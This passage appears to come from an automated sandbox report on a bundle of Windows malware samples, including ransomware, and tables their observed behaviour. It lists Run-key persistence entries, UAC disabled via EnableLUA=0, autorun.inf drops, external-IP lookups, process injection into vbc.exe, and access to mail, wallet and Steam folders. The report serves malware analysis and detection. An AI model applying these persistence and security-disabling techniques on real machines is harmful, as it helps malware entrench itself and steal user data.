| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\L2SecHC\\dllhost.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yahoo Messengger = "C:\\Windows\\system32\\RVHOST.exe" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Endermanch@NoMoreRansom = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\RIP_YOUR_PC_LOL\\[email protected]\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Endermanch@WannaCrypt0r = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\00000000\\[email protected]\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." | C:\PROGRA~3\system.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7 = "\"C:\\Users\\Admin\\Desktop\\LockApprove.wma\\7.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Admin\\3D Objects\\Idle.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\mpr\\RuntimeBroker.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BlockHost.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\Files\\Winlog.exe" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4363463463464363463463463 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\4363463463464363463463463\\4363463463464363463463463.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Windows Mail\\dwm.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\Desktop\7.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." | C:\PROGRA~3\system.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.VisualElementsManifest\\msedge.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe" | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Documents and Settings\\smss.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\WerFault\\RuntimeBroker.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x2s443bc.cs1.tmp = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\is-KCIOL.tmp\\x2s443bc.cs1.tmp.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\sc\\RuntimeBroker.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\System32\L2SecHC\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\System32\L2SecHC\dllhost.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File created | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Windows\System32\WerFault\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d | C:\Users\Admin\Desktop\6.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Windows\SysWOW64\setting.ini | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe | N/A |
| File created | C:\Windows\System32\sc\RuntimeBroker.exe | C:\Users\Admin\Desktop\6.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Windows\System32\sc\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d | C:\Users\Admin\Desktop\6.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Windows\System32\WerFault\RuntimeBroker.exe | C:\Users\Admin\Desktop\6.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Windows\SysWOW64\RVHOST.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\setting.ini | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Windows\System32\L2SecHC\dllhost.exe | C:\Users\Admin\Desktop\6.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Windows\System32\mpr\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d | C:\Users\Admin\Desktop\6.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\documents | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Windows\System32\L2SecHC\5940a34987c99120d96dace90a3f93f329dcad63 | C:\Users\Admin\Desktop\6.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\SysWOW64\RVHOST.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\desktop | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Windows\System32\mpr\RuntimeBroker.exe | C:\Users\Admin\Desktop\6.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpDE4A.bmp" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\000.bmp" | C:\Users\Admin\Desktop\8.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5868 set thread context of 5340 | N/A | C:\Users\Admin\Desktop\7.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
| PID 5868 set thread context of 3244 | N/A | C:\Users\Admin\Desktop\7.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{FB050~1\WINDOW~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\Program Files\InstallExpand.MTS | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | \??\c:\program files\ | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmprph.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\UnprotectSet.MOD | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~3\ADOBER~1\GEFORC~1.EXE | C:\Windows\svchost.com | N/A |
| File created | C:\Program Files (x86)\Microsoft\DesktopLayer.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| File opened for modification | C:\Program Files\TracePing.jpg | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | C:\Program Files\UseClear.htm | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MICROS~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MI391D~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\DesktopLayer.exe | C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files (x86)\Windows Mail\dwm.exe | C:\Users\Admin\Desktop\6.exe | N/A |
| File opened for modification | C:\Program Files\ExitSet.html | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\setup_wm.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpconfig.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\px739A.tmp | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\Program Files\FormatUnprotect.php | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{17316~1\WINDOW~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\Program Files\6b5b0cab8df9d59f.tmp | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | C:\Program Files\ShowLimit.iso | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | C:\PROGRA~3\ADOBER~1\GEFORC~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wabmig.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmplayer.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\Program Files\ConvertJoin.contact | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | C:\PROGRA~3\ADOBER~1\GEFORC~1.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\DESKTO~1.EXE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wabmig.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpshare.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmplayer.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\MeasureGet.csv | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\program files (x86)\the bat! | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\program files (x86)\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\desktop | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
